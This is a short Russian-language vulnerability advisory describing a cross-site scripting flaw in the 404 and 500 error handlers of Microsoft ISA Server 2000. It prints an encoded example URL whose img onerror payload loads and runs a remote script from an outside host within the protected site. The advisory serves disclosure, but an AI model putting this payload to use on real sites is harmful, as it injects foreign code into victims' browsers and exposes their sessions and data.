Уязвимость в проверке правильности входных данных обнаружена в Microsoft Internet Security and Acceleration (ISA) Server. Удаленный пользователь может выполнить XSS нападение. 

Уязвимость обнаружена в обработчике 404 и 500 ошибки в Microsoft Internet Security and Acceleration (ISA) Server. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта.

Пример: 

http://<img%09src=""%09onerror=" document.scripts[0].src=%27http%5Cx3a%5Cx2f%
5Cx2f jscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0 

Этот пример включит и выполнит http://jscript.dk/test.js на YOUR.TLD, при условии, что YOUR.TLD защищен ISA Server. 

Уязвимость обнаружена в Microsoft Internet Security and Acceleration (ISA) Server 2000.



Оставить мнение